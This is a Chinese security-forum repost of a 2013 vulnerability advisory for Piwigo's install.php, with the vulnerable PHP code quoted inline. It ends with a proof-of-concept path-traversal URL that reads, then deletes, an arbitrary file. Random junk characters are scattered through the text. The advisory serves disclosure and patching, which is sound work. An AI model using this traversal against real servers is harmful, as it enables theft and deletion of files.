中国网络渗透测试联盟

标题: Piwigo任意文件泄露和任意文件删除漏洞 [打印本页]

---

作者: admin    时间: 2013-3-14 20:15
标题: Piwigo任意文件泄露和任意文件删除漏洞
Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
  c0 e. |) Q/ r2 Z====================================================================
6 V2 ?0 U% k* U! J+ s  l# X. N8 B/install.php:
( j8 E$ L! }/ u-------------
  O* u- a+ }7 P  N8 t5 n# {: j113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
6 D! Z6 x. f! [115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
0 f$ W: X! s9 R! A" L8 I116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
0 \+ O5 a. o' }1 ]119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
6 q. k: s3 _! z" @3 `' {' l! ?121:   echo file_get_contents($filename);
122:   unlink($filename);
* H+ }: ^' T: Y2 v123:   exit();
5 T# S1 J: ?2 ~) r124: }
. f' Y6 t- C5 i0 S2 v* K====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
  h  z" T5 b- D0 N$ U& q6 D           PHP 5.4.4
           MySQL 5.5.25a
7 T) ~, B+ ]# v$ F5 F3 v- H
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
% `3 |) J2 q" j1 X; C2 d' L                            @zeroscience
; m, ?' k# p+ x
Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
5 m. P. T  F4 E) n9 FVendor Patch: http://piwigo.org/bugs/view.php?id=2843
& Q2 {4 a/ }* G+ Z/ \
! b* |! D1 T. F15.02.2013
- ^# P# s. u% ~$ s
, d6 e, U# h; b/ I& [--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
& e! {6 x& }5 O: ?3 N0 \% @
5 @' j; v7 z" c, Z, T' F( j& {

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2